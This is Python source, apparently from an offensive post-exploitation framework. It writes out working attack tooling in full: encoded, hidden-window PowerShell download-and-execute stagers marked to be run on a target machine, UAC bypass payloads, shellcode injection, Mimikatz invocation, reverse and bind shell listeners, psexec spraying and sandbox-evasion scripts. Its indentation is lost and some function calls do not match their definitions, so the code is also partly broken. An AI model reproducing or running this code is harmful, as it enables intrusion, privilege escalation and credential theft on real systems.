def reversePowerShellInvokeMimikatzGeneration(payloadchoice, payloadname):
from menu import returnIP
moduleport = FUNCTIONS().randomUnusedPort()
FUNCTIONS().DoServe(returnIP(),
"",
"./externalmodules",
port=moduleport,
printIt=False)
powershellScript = payloadchoice % (returnIP(), moduleport)
clientnumber = int(
clientUpload(
payloadname,
powershellScript,
isExe=False,
json=
'{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}'
))
from stager import returnServerList
try:
for server in returnServerList():
while True:
if server.handlers[clientnumber].in_buffer:
print server.handlers[clientnumber].in_buffer.pop()
break
else:
time.sleep(0.1)
except KeyboardInterrupt:
pass
return "pass"
def UACBYPASS(self, version):
from menu import returnIP
randomPort = FUNCTIONS().randomUnusedPort()
uacbypassrcfilecontents = """run post/windows/manage/exec_powershell SCRIPT="IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/stage.ps1')" SESSION=1""" % (
returnIP(), randomPort)
moduleport = FUNCTIONS().randomUnusedPort()
FUNCTIONS().DoServe(returnIP(),
"",
"./externalmodules",
port=moduleport,
printIt=False)
if version == "7":
uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-BypassUAC.ps1");\nInvoke-BypassUAC -Command \"powershell -enc %s\" """ % (
returnIP(), moduleport,
base64.b64encode(
self.injectshellcode_nosleep.encode('utf_16_le')))
a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode,
args=(uacbypassfilecontent,
randomPort))
a.daemon = True
a.start()
elif version == "10":
uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-SilentCleanUpBypass.ps1");\nInvoke-SilentCleanUpBypass -Command \"cmd /c powershell -WindowStyle Hidden -enc %s && REM\" """ % (
returnIP(), moduleport,
base64.b64encode(
self.injectshellcode_nosleep.encode('utf_16_le')))
a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode,
args=(uacbypassfilecontent,
randomPort))
a.daemon = True
a.start()
with open('uacbypass.rc', 'w') as uacbypassfilerc:
uacbypassfilerc.write(uacbypassrcfilecontents)
uacbypassfilerc.close()
return self.shellcode
def printListener(printit=True, returnit=False):
from listener import Server
from menu import returnIP
powershellFileName = 'p.ps1'
while True:
bindOrReverse = prompt_toolkit.prompt('[?] (b)ind/(r)everse: ',
patch_stdout=True,
completer=WordCompleter(
['b', 'r'])).lower()
if bindOrReverse == 'b' or bindOrReverse == 'r':
break
if bindOrReverse == 'r':
powershellContent = open('lib/powershell/stager.ps1', 'r').read()
windows_powershell_stager = powershellContent % ('False', returnIP(),
'5555')
if bindOrReverse == 'b':
powershellContent = open('lib/powershell/stager.ps1', 'r').read()
windows_powershell_stager = powershellContent % ('True', '', '5556')
with open((payloaddir() + '/' + powershellFileName),
'w') as powershellStagerFile:
powershellStagerFile.write(windows_powershell_stager)
powershellStagerFile.close()
randoStagerDLPort = FUNCTIONS().randomUnusedPort()
FUNCTIONS().DoServe(returnIP(),
powershellFileName,
payloaddir(),
port=randoStagerDLPort,
printIt=False)
stagerexec = 'powershell -w hidden -noni -enc ' + (
"IEX (New-Object Net.Webclient).DownloadString('http://" + returnIP() +
":" + str(randoStagerDLPort) + "/" + powershellFileName +
"')").encode('utf_16_le').encode('base64').replace('\n', '')
if printit:
print t.bold_green + '[!] Run this on target machine...' + t.normal + '\n\n' + stagerexec + '\n'
if bindOrReverse == 'b':
if not '5556' in str(serverlist):
ipADDR = raw_input(
'[?] IP Address of target (after executing stager): ')
connectserver = Server(ipADDR, 5556, bindsocket=False)
serverlist.append(connectserver)
if bindOrReverse == 'r':
if not '5555' in str(serverlist):
listenerserver = Server('0.0.0.0', 5555, bindsocket=True)
serverlist.append(listenerserver)
if returnit:
return stagerexec
else:
return "pass"
def clientUpload(powershellExec, isExe, json):
from menu import returnIP
from encrypt import getSandboxScripts
clientnumber = checkUpload()
if clientnumber:
if isExe:
newpayloadlayout = FUNCTIONS().powershellShellcodeLayout(
powershellExec)
moduleport = FUNCTIONS().randomUnusedPort()
FUNCTIONS().DoServe(returnIP(),
"",
"./externalmodules",
port=moduleport,
printIt=False)
encPowershell = getSandboxScripts('powershell')
encPowershell += "IEX(New-Object Net.WebClient).DownloadString('http://%s:%s/Invoke-Shellcode.ps1');Start-Sleep 30;Invoke-Code -Force -Shellcode @(%s)" % (
returnIP(), moduleport, newpayloadlayout.rstrip(','))
encPowershell = base64.b64encode(encPowershell.encode('UTF-16LE'))
fullExec = "$Arch = (Get-Process -Id $PID).StartInfo.EnvironmentVariables['PROCESSOR_ARCHITECTURE'];if($Arch -eq 'x86'){powershell -exec bypass -enc \"%s\"}elseif($Arch -eq 'amd64'){$powershell86 = $env:windir + '\SysWOW64\WindowsPowerShell\\v1.0\powershell.exe';& $powershell86 -exec bypass -enc \"%s\"}" % (
encPowershell, encPowershell)
b64Exec = base64.b64encode(fullExec.encode('UTF-16LE'))
lenb64 = len(b64Exec)
else:
b64Exec = base64.b64encode(powershellExec.encode('UTF-16LE'))
lenb64 = len(b64Exec)
splitPayoad = checkPayloadLength(b64Exec)
if splitPayoad:
for p in splitPayoad:
for server in serverlist:
if clientnumber in server.handlers.keys():
server.handlers[clientnumber].out_buffer.append(json %
(p))
time.sleep(0.5)
time.sleep(0.5)
for server in serverlist:
if clientnumber in server.handlers.keys():
server.handlers[clientnumber].out_buffer.append(
'{"type":"", "data":"", "sendoutput":"false", "multiple":"exec"}'
)
else:
for server in serverlist:
if clientnumber in server.handlers.keys():
server.handlers[clientnumber].out_buffer.append(json %
(b64Exec))
return clientnumber
else:
return False
def ALLCHECKS(self):
from menu import returnIP
moduleport = FUNCTIONS().randomUnusedPort()
FUNCTIONS().DoServe(returnIP(),
"",
"./externalmodules",
port=moduleport,
printIt=False)
with open('allchecks.ps1', 'w') as allchecksfile:
allchecksfile.write(
"""IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/PowerUp.ps1");invoke-allchecks"""
% (returnIP(), moduleport))
allchecksfile.close()
return self.shellcode
def randomUnusedPort(self):
from menu import returnIP
s = socket.socket()
s.bind((returnIP(), 0))
port = s.getsockname()[1]
s.close()
return port
def UACBypassGeneration(payloadchoice, payloadname):
from menu import returnIP
moduleport = FUNCTIONS().randomUnusedPort()
FUNCTIONS().DoServe(returnIP(),
"",
"./externalmodules",
port=moduleport,
printIt=False)
encoded = printListener(False, True)
powershellScript = payloadchoice % (returnIP(), moduleport, encoded)
clientnumber = int(
clientUpload(
payloadchoice(),
isExe=False,
json=
'{"type":"script", "data":"%s", "sendoutput":"false", "multiple":"false"}'
))
print t.bold_green + '\n[*] If UAC Bypass worked, expect a new admin session' + t.normal
return "pass"
def DoPayloadUpload(payloadname):
from menu import returnIP
want_to_upload = raw_input(
'\n[*] Upload To Local Websever or (p)sexec? [y]/p/n: ')
if want_to_upload.lower() == 'p' or want_to_upload.lower() == 'psexec':
DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe')
elif want_to_upload.lower() == 'y' or want_to_upload.lower() == '':
FUNCTIONS().DoServe(returnIP(),
payloadname,
payloaddir(),
port=8000,
printIt=True)
def stagePowershellCode(self, powershellFileContents, port):
from menu import returnIP
DIR = 'stager'
if not os.path.isdir(DIR):
os.mkdir(DIR)
os.chdir(DIR)
with open('stage.ps1', 'w') as psFile:
psFile.write(powershellFileContents)
httpd = SocketServer.TCPServer((returnIP(), port), HANDLER)
httpd.handle_request()
os.chdir('..')
import shutil
shutil.rmtree(DIR)
def reverseIpAndPort(port):
from menu import returnIP
portnum = raw_input('\n[*] Press Enter For Default Port(%s)\n[*] Port> ' %
(t.bold_green + port + t.normal))
if len(portnum) is 0:
portnum = port
IP = returnIP()
ipaddr = raw_input(
'\n[*] Press Enter To Get Local Ip Automatically(%s)\n[*] IP> ' %
(t.bold_green + IP + t.normal))
if len(ipaddr) == 0:
ipaddr = IP
if not IP:
print t.bold_red + 'Error Getting Ip Automatically' + t.normal
ipaddr = raw_input(
'\n[*] Please Enter Your IP Manually(Automatic Disabled)\n[*] IP> '
)
return (portnum, ipaddr)